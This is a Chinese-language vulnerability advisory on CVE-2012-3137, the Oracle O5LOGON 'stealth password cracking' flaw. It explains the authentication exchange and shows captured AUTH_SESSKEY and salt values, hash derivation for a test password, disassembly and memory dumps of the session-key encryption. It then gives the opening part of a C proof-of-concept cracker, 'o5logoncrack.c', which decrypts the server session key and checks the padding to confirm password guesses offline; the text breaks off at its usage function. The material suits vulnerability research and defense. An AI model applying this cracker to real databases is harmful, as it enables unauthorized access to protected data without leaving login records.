0%

Oracle Database身份验证协议安全限制绕过漏洞(CVE-2012-3137)

1
2
3
4
5
6
7
8
9
10
11
12
13
NSFOCUS ID:    20847
BUGTRAQ ID: 55651
CVE ID: CVE-2012-3137
远程漏洞: 是
本地漏洞: 是
漏洞类型:
漏洞影响: 远程攻击者可以密码进行离线密码暴力破解
危险指数: 高
创建时间: 2012-9-27
更新时间:
攻击代码: 无

跟踪工程师: zz

漏洞概述:

Oracle是一款广泛被使用的商业数据库。

Oracle O5LOGON认证协议存在漏洞,这个漏洞可以使攻击者离线暴力破解Oracle数据库密码,
从而访问受保护的Oracle数据库中的数据。要利用这个漏洞攻击者只需要知道一个合法的
数据库用户名和一个正确的数据库名(SID),不需要使用中间人攻击。

Martinez Fayo 在2010年5月向Oracle报告了这个问题,Oracle在2011年的中期通过patch
set 11.2.0.3修复了这个漏洞,使用了新版本的协议。但是Oracle没有在 11.1和11.2 中
修复这个问题,因此这些版本仍然存在漏洞。

由于漏洞发生在认证阶段的早期,获取需要的数据后马上断开连接,不会在Oracle数据库
里留下登录日志,因此这个漏洞被称为 “stealth password cracking vulnerability”

细节:

O5LOGON 过程

1
2
3
4
5
6
7
8
         send username
Client -----------------------------> Server

AUTH_SESSKEY AUTH_VFR_DATA
Client <---------------------------- Server

AUTH_SESSKEY AUTH_PASSWORD
Clinet -----------------------------> Server

和这个漏洞相关的两个报文,包含了需要的信息, 如下:

(1) Server -> client

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0000   00 f8 00 00 06 00 00 00 00 00 08 02 00 0c 00 00  ................
0010 00 0c 41 55 54 48 5f 53 45 53 53 4b 45 59 60 00 ..AUTH_SESSKEY`.
0020 00 00 60 35 32 46 43 30 34 42 31 46 46 38 31 31 ..`52FC04B1FF811
0030 30 43 41 31 32 36 33 44 46 35 42 43 36 31 41 37 0CA1263DF5BC61A7
0040 45 35 37 37 34 30 43 38 41 35 31 31 31 44 32 32 E57740C8A5111D22
0050 42 34 31 45 35 33 43 43 31 36 37 46 44 46 32 41 B41E53CC167FDF2A
0060 36 38 37 38 39 35 38 32 30 30 44 39 42 32 42 36 6878958200D9B2B6
0070 41 35 31 43 39 35 44 37 37 39 46 44 45 42 41 42 A51C95D779FDEBAB
0080 42 36 39 00 00 00 00 0d 00 00 00 0d 41 55 54 48 B69.........AUTH
0090 5f 56 46 52 5f 44 41 54 41 14 00 00 00 14 34 33 _VFR_DATA.....43
00a0 45 30 42 45 32 30 42 33 32 42 30 42 42 37 36 45 E0BE20B32B0BB76E
00b0 35 37 25 1b 00 00 04 01 00 00 00 02 00 00 00 00 57%.............
00c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00e0 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 ................
00f0 00 00 00 00 00 00 00 00 ........

(2) server <- client

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
0000   03 73 03 d0 1a 05 0a 09 00 00 00 21 01 00 00 44  .s.........!...D
0010 46 bf bf 0d 00 00 00 ec 42 bf bf d8 53 bf bf 03 F.......B...S...
0020 73 79 73 24 00 00 00 0c 41 55 54 48 5f 53 45 53 sys$....AUTH_SES
0030 53 4b 45 59 20 01 00 00 fe 40 46 41 36 44 43 44 SKEY ....@FA6DCD
0040 30 46 33 38 39 45 39 32 44 31 38 46 38 31 38 38 0F389E92D18F8188
0050 45 43 36 39 33 31 33 42 35 32 34 46 34 32 31 31 EC69313B524F4211
0060 38 34 46 41 45 36 37 39 36 31 33 41 37 32 46 43 84FAE679613A72FC
0070 38 44 46 44 30 41 34 43 37 42 20 42 39 33 41 36 8DFD0A4C7B B93A6
0080 41 43 42 38 45 30 35 42 38 32 35 38 41 30 32 30 ACB8E05B8258A020
0090 44 32 39 35 34 45 43 31 42 36 33 00 01 00 00 00 D2954EC1B63.....
00a0 27 00 00 00 0d 41 55 54 48 5f 50 41 53 53 57 4f '....AUTH_PASSWO
00b0 52 44 c0 00 00 00 40 32 43 35 46 39 35 37 41 36 RD....@2C5F957A6
00c0 35 33 32 41 44 39 31 44 39 31 36 46 34 45 35 46 532AD91D916F4E5F
00d0 41 37 44 32 46 44 41 30 45 36 43 44 46 46 42 41 A7D2FDA0E6CDFFBA
00e0 41 45 44 38 38 33 43 41 46 34 46 32 30 30 43 38 AED883CAF4F200C8
00f0 39 38 33 41 45 33 44 00 00 00 00 18 00 00 00 08 983AE3D.........
0100 41 55 54 48 5f 52 54 54 0f 00 00 00 05 36 36 37 AUTH_RTT.....667
0110 30 38 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f 08....'....AUTH_
0120 43 4c 4e 54 5f 4d 45 4d 0c 00 00 00 04 34 30 39 CLNT_MEM.....409
0130 36 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f 54 6....'....AUTH_T
0140 45 52 4d 49 4e 41 4c 12 00 00 00 06 70 74 73 2f ERMINAL.....pts/
0150 31 38 00 00 00 00 2d 00 00 00 0f 41 55 54 48 5f 18....-....AUTH_
0160 50 52 4f 47 52 41 4d 5f 4e 4d 51 00 00 00 1b 73 PROGRAM_NMQ....s
0170 71 6c 70 6c 75 73 40 68 65 6e 69 63 65 73 20 28 qlplus@henices (
0180 54 4e 53 20 56 31 2d 56 33 29 00 00 00 00 24 00 TNS V1-V3)....$.
0190 00 00 0c 41 55 54 48 5f 4d 41 43 48 49 4e 45 15 ...AUTH_MACHINE.
01a0 00 00 00 07 68 65 6e 69 63 65 73 00 00 00 00 18 ....henices.....
01b0 00 00 00 08 41 55 54 48 5f 50 49 44 0c 00 00 00 ....AUTH_PID....
01c0 04 36 32 32 38 00 00 00 00 18 00 00 00 08 41 55 .6228.........AU
01d0 54 48 5f 53 49 44 15 00 00 00 07 68 65 6e 69 63 TH_SID.....henic
01e0 65 73 00 00 00 00 18 00 00 00 08 41 55 54 48 5f es.........AUTH_
01f0 41 43 4c 0c 00 00 00 04 34 34 30 30 00 00 00 00 ACL.....4400....
0200 36 00 00 00 12 41 55 54 48 5f 41 4c 54 45 52 5f 6....AUTH_ALTER_
0210 53 45 53 53 49 4f 4e 6f 00 00 00 25 41 4c 54 45 SESSIONo...%ALTE
0220 52 20 53 45 53 53 49 4f 4e 20 53 45 54 20 54 49 R SESSION SET TI
0230 4d 45 5f 5a 4f 4e 45 3d 27 2b 30 38 3a 30 30 27 ME_ZONE='+08:00'
0240 00 01 00 00 00 45 00 00 00 17 41 55 54 48 5f 4c .....E....AUTH_L
0250 4f 47 49 43 41 4c 5f 53 45 53 53 49 4f 4e 5f 49 OGICAL_SESSION_I
0260 44 60 00 00 00 20 43 41 41 38 39 33 41 43 30 41 D`... CAA893AC0A
0270 34 33 30 46 41 30 45 30 34 30 30 30 37 46 30 31 430FA0E040007F01
0280 30 31 31 38 35 34 00 00 00 00 30 00 00 00 10 41 011854....0....A
0290 55 54 48 5f 46 41 49 4c 4f 56 45 52 5f 49 44 00 UTH_FAILOVER_ID.
02a0 00 00 00 00 00 00 00 .......
1
2
3
4
AUTH_SESSKEY_SRV: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_CLI: FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD : 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA : 43E0BE20B32B0BB76E57

Oracle O5LOGON 协议介绍

Oracle 11g password hash 算法为, 用户名 sys, 密码 nsfocus

1
2
3
>>> import hashlib
>>> hashlib.sha1('nsfocus' + '\x43\xE0\xBE\x20\xB3\x2B\x0B\xB7\x6E\x57').hexdigest()
'c3d98762d258d4bd92c572065ddea9af38123f88'

可以在Oracle数据中查询:

1
2
3
4
5
6
7
8
9
10
11
SQL> select name, password, spare4 from sys.user$ where name = 'SYS';

NAME PASSWORD
------------------------------ ------------------------------
SPARE4
--------------------------------------------------------------------------------
SYS 0F2417000362F55F
S:C3D98762D258D4BD92C572065DDEA9AF38123F8843E0BE20B32B0BB76E57

password hash: C3D98762D258D4BD92C572065DDEA9AF38123F88
salt : 43E0BE20B32B0BB76E57
  1. client 发送用户名给server
    2 server 判断是否是可用的用户名,如果用户名可用,进入下一步。
  2. Server 加密AUTH_SESSKEY, 取出 salt

使用AES192 CBC 加密AUTH_SESSKEY, key为oralce数据库中的20字节的password hash和4个
零(192bit)。

  1. Server 将加密的AUTH_SESSKEY和AUTH_VFR_DATA 发送给Client
    AUTH_VFR_DATA 为salt

  2. Client计算password hash (通过用户输入的密码), 使用Client计算的password hash
    (加上4个零)为key 使用AES192 CBC算法加密Client AUTH_SESSKEY

  3. Client 计算 Combine_SessKey
    将解密的Server AUTH_SESSKEY 和 Client AUTH_SESSKEY的第17个字节开始的24个字节做异
    或,将异或结果的前16字节做MD5, 后8字节做MD5, 得到Combine_SessKey

  4. Client 使用 Combine_SessKey 加密用户输入的密码明文,得到 AUTH_PASSWORD
    使用算法为AES192 CBC

  5. Client 将加密的Client AUTH_SESSKEY和加密的AUTH_PASSWORD 发送给 Server

  6. Server 使用数据库中的 password hash 解密 Client AUTH_SESSKEY

  7. Server 尝试解密AUTH_PASSWORD 解密成功则认证通过

参看:
http://www.oxid.it/downloads/oracle_tns_aes192_check.txt

这个漏洞是生成server sesskey 时,在末尾添加了8个0x08, 因为salt已知(由服务器返回
),因此我们只需尝试计算SHA-1的password hash,然后利用这个password hash 去解密
server sesskey, 只要末尾是8个0x08 则说明这是正确的server sesskey,此时使用的密
码为正确的密码,原因是

AES 192 加密块长度为128 bit (16 byte), 分组加密如果明文内容不是块长度的整数倍时
需要填充。填充部分的内容为差的字节数,比如11字节的明文,需要在末尾填充5个0x5

从汇编代码里分析server session key 的生成过程,分析的程序为 Oracle.exe 11.2.0.1.0
oracle.exe调用 oran11.ztvo5ke 加密session key

oran11.ztvo5ke -> oracrypt11.ztceenc -> orancrypt11.ztcen

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
struct e_key {
unsigned char s[2];
unsigned char key[100];
};

struct sess_key {
uint32_t type;
unsigned char key[40];
}

struct pwd_hash {
uint32_t unknown1;
uint32_t hash_len;
unsigned char hash[20];
}

ztvo5ke ( e_key*, sess_key*, pwd_hash*, int);

sess_key.type == 0x1492 ( AES 192 )

plaintext 24 + 16 = 40

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
.text:101BC481                 push    eax        ; unknown structure
.text:101BC482 push edx ; encrypted session key
.text:101BC483 push 28h ; length
.text:101BC485 push ecx ; plaintext session key
.text:101BC486 push 0
.text:101BC488 push ebx ; 0x18
.text:101BC489 push 87004001h
.text:101BC48E call ztceenc ; AES 192
.text:101BC493 add esp, 1Ch
.text:101BC496 mov ebx, eax
.text:101BC498 test ebx, ebx
.text:101BC49A jnz short loc_101BC4B8
.text:101BC49C lea edx, [ebp+var_A4]
.text:101BC4A2 lea eax, [edi+2]
.text:101BC4A5 push eax ; e_key+2
.text:101BC4A6 push [ebp+var_C8]
.text:101BC4AC push edx ; encryted session key
.text:101BC4AD call ztucbtx

ztceenc 运行前后的情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
0DC3A4E4                                      40 00 00 00                       
0DC3A4F4 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..
0DC3A504 0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..
0DC3A514 02 00 00 00 00 00 00 00 14 00 00 00 14 00 00 00..
0DC3A524 44 94 3E 10 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A534 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A544 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A554 7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..
0DC3A564 EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..
0DC3A574 8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..
0DC3A584 C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..
0DC3A594 0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A5A4 18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..
0DC3A5B4 94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..
0DC3A5C4 F8 49 FE 0C 10 FB EC 0D..........................


eax = 0DC3A4F0
edx = 0DC3A514
ecx = 0DC3A554
ebx = 0DC3A5A4


0DC3A4E4 30 00 00 00..
0DC3A4F4 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..
0DC3A504 0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..
0DC3A514 61 15 91 7F D6 AE B9 29 00 07 A4 02 A6 B1 2B AA..
0DC3A524 BD 3B AA 0C 13 C0 E5 18 8E FE BA AC F5 4C 01 BE.
0DC3A534 96 8F 59 0D B9 9E 2C F6 98 74 1F EF 22 CE 17 47..
0DC3A544 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A554 7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..
0DC3A564 EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..
0DC3A574 8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..
0DC3A584 C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..
0DC3A594 0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A5A4 18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..
0DC3A5B4 94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..
0DC3A5C4 F8 49 FE 0C 10 FB EC 0D


0DC3A4F0 30 00 00 00 offset
0DC3A514 61 15 91 7F ... encrypted session key (0x30 byte)
0DC3A554 7A EF 5B 9E ... plaintext session key (0x28 byte)
0DC3A584 8 B3 13 21 ... password hash (0x18 byte)

AES 192 加密40字节的明文,需要填充 8个 0x08

11.1

1
2
3
4
5
6
7
PASSWORD:            nsfocus
AUTH_SESSKEY: 43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD: 8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA: 3DA8A309D636ACF87004

PASSWORD HASH: EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

1
2
3
4
5
6
7
PASSWORD    :        nsfocus
AUTH_SESSKEY: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA 43E0BE20B32B0BB76E57

PASSWORD HASH: C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

exploit (POC)

o5logoncrack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
/* 
11.1

PASSWORD: nsfocus
AUTH_SESSKEY: 43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD: 8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA: 3DA8A309D636ACF87004

PASSWORD HASH: EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

PASSWORD : nsfocus
AUTH_SESSKEY: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA 43E0BE20B32B0BB76E57

PASSWORD HASH: C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57

11.x
ED91B97A04000F326F17430A65DACB30CD1EF788E6EC310742B811E32112C0C9CC39554C9C01A090CB95E95C94140C28
40E7B86C99F4BF1D0F17538C22EBCE054F5F677E2B521480F1F56143D047C00469A87049DE1B9CADDC8EA71392AD6E3A
2D4FD970C12D9618742E4525C514105E0BE24DE75C04A0C4BF6DD46BE88A339E
7FD52BC80AA5836695D4
18C314BE125DF23689215C78C33F623AABF1152E


-------------------------------------
aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

----------------
aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

------------------
aes key
0000 18 c3 14 be 12 5d f2 36 89 21 5c 78 c3 3f 62 3a
0010 ab f1 15 2e 00 00 00 00

decrypted_server_sesskey
0000 07 eb ab db ee 3a 0e b0 ab e1 9f 68 12 c1 e3 e6
0010 5a e9 fd 7c b9 ca ae e2 fb 21 20 d4 af 83 de 0c
0020 1e 12 dc 01 22 05 a0 75 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

AUTH_SESSKEY
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/aes.h>
#include <openssl/md5.h>
#include <openssl/sha.h>
#include "getopt.h"


//*********************************************************************************************************************
// Hashes captured on the network during authentication phase

//unsigned char AUTH_SESSKEY [] = { 0x43,0xFD,0x38,0x02,0x93,0x77,0xC8,0x46,0x20,0xAE,0x18,0x51,0xFC,0x1D,0x23,0x14,0x09,0x98,0x50,0x64,0xDE,0xA0,0xD0,0xB8,0xD4,0x8E,0x50,0xE6,0x05,0x17,0x51,0xA5,0xD8,0xFD,0xFE,0xAA,0xA9,0xF8,0x3B,0x99,0xF3,0x7B,0x05,0x1F,0xA6,0x7F,0x85,0x46};
//
//unsigned char AUTH_SESSKEY_C[] = { 0xC7,0x24,0x8F,0x08,0x73,0xF0,0x4B,0x5A,0x02,0xE5,0x91,0x78,0x80,0x4B,0xD3,0x61,0xB0,0xC7,0x7B,0x20,0xA4,0xCF,0x68,0x54,0x60,0xDA,0x47,0x29,0x96,0xD5,0x24,0x57,0x45,0xA7,0x91,0xDF,0xEA,0x14,0x39,0x98,0x31,0xEC,0x62,0x38,0x08,0x08,0x90,0x3C};
//
//unsigned char AUTH_PASSWORD [] = { 0x8B,0x4C,0x7D,0x85,0xF4,0x21,0xEB,0xA0,0x59,0xFD,0xBA,0x21,0xF5,0x70,0x8F,0xD4,0xD3,0xBB,0x8A,0xB2,0x16,0x89,0x41,0x24,0x3B,0x5E,0xF0,0x76,0x81,0xF3,0xB8,0x0A };
//
//unsigned char AUTH_VFR_DATA [] = { 0x3D,0xA8,0xA3,0x09,0xD6,0x36,0xAC,0xF8,0x70,0x04 };

//unsigned char AUTH_SESSKEY [] = { 0x52,0xFC,0x04,0xB1,0xFF,0x81,0x10,0xCA,0x12,0x63,0xDF,0x5B,0xC6,0x1A,0x7E,0x57,0x74,0x0C,0x8A,0x51,0x11,0xD2,0x2B,0x41,0xE5,0x3C,0xC1,0x67,0xFD,0xF2,0xA6,0x87,0x89,0x58,0x20,0x0D,0x9B,0x2B,0x6A,0x51,0xC9,0x5D,0x77,0x9F,0xDE,0xBA,0xBB,0x69 };
//
//unsigned char AUTH_SESSKEY_C[] = { 0xFA,0x6D,0xCD,0x0F,0x38,0x9E,0x92,0xD1,0x8F,0x81,0x88,0xEC,0x69,0x31,0x3B,0x52,0x4F,0x42,0x11,0x84,0xFA,0xE6,0x79,0x61,0x3A,0x72,0xFC,0x8D,0xFD,0x0A,0x4C,0x7B,0xB9,0x3A,0x6A,0xCB,0x8E,0x05,0xB8,0x25,0x8A,0x02,0x0D,0x29,0x54,0xEC,0x1B,0x63 };
//
//unsigned char AUTH_PASSWORD [] = { 0x2C,0x5F,0x95,0x7A,0x65,0x32,0xAD,0x91,0xD9,0x16,0xF4,0xE5,0xFA,0x7D,0x2F,0xDA,0x0E,0x6C,0xDF,0xFB,0xAA,0xED,0x88,0x3C,0xAF,0x4F,0x20,0x0C,0x89,0x83,0xAE,0x3D };
//
//unsigned char AUTH_VFR_DATA [] = { 0x43,0xE0,0xBE,0x20,0xB3,0x2B,0x0B,0xB7,0x6E,0x57 };
//


//unsigned char AUTH_SESSKEY [] = { 0xED,0x91,0xB9,0x7A,0x04,0x00,0x0F,0x32,0x6F,0x17,0x43,0x0A,0x65,0xDA,0xCB,0x30,0xCD,0x1E,0xF7,0x88,0xE6,0xEC,0x31,0x07,0x42,0xB8,0x11,0xE3,0x21,0x12,0xC0,0xC9,0xCC,0x39,0x55,0x4C,0x9C,0x01,0xA0,0x90,0xCB,0x95,0xE9,0x5C,0x94,0x14,0x0C,0x28 };

//unsigned char AUTH_VFR_DATA [] = { 0x7F,0xD5,0x2B,0xC8,0x0A,0xA5,0x83,0x66,0x95,0xD4 };

//unsigned char AUTH_SESSKEY [] = { 0xBD,0x53,0x44,0x89,0x91,0xEE,0xAB,0x1E,0xCD,0x8D,0x32,0xFB,0x59,0x52,0x3F,0x0C,0xBD,0xB3,0x3B,0x40,0xC2,0x8F,0xEB,0xED,0xDD,0x5A,0xA3,0xA4,0xAF,0x0C,0xF6,0xB7,0x23,0x06,0x16,0x2D,0x3F,0x0C,0x1E,0x8D,0xB2,0x53,0x8A,0xF2,0x91,0xEC,0x01,0xA5};

//unsigned char AUTH_VFR_DATA [] = { 0x03,0x1C,0xB4,0x72,0xC4,0xD9,0x04,0x12,0xDD,0x31 };

//*********************************************************************************************************************

int HexStringtoBinArray(char* str, unsigned char* array){
int alen=strlen(str)/2;
unsigned char t[2];
unsigned int hexc;
int j=0;
int i=0;
for(;i<strlen(str);i=i+2){
t[0]=str[i];
t[1]=str[i+1];
hexc = t[0]-48;
if (hexc > 9) hexc-=7;
array[j]=hexc*16;
hexc = t[1]-48;
if (hexc > 9) hexc-=7;
array[j]+=hexc;
j++;
}
return j;
}

static void hexdump( FILE *f, const char *title, const unsigned char *s,int l) {
int n = 0;

fprintf(f, "%s", title);
for (; n < l; ++n) {
if ((n % 16) == 0) {
fprintf(f, "\n%04x", n);
}
fprintf(f, " %02x", s[n]);
}

fprintf(f, "\n");
}

void ORACLE_MixCase_Hash (char *passwd, int passwd_len, unsigned char salt[10], unsigned char* oracle_mixcase_hash) {
unsigned char to_hash[256];
SHA_CTX ctx;

memcpy (to_hash, passwd, passwd_len);
memcpy (to_hash+passwd_len, salt, 10);

SHA1_Init (&ctx);
SHA1_Update (&ctx, to_hash, passwd_len+10);
SHA1_Final (oracle_mixcase_hash, &ctx);
}

void ORACLE_TNS_Decrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

AES_KEY key;
AES_set_decrypt_key(aes_key_bytes, 192, &key);
AES_cbc_encrypt(input, output, input_len, &key, iv, AES_DECRYPT);
}

void ORACLE_TNS_Encrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

AES_KEY key;
AES_set_encrypt_key(aes_key_bytes, 192, &key);
AES_cbc_encrypt(input, output, input_len, &key, iv, AES_ENCRYPT);
}

void usage() {
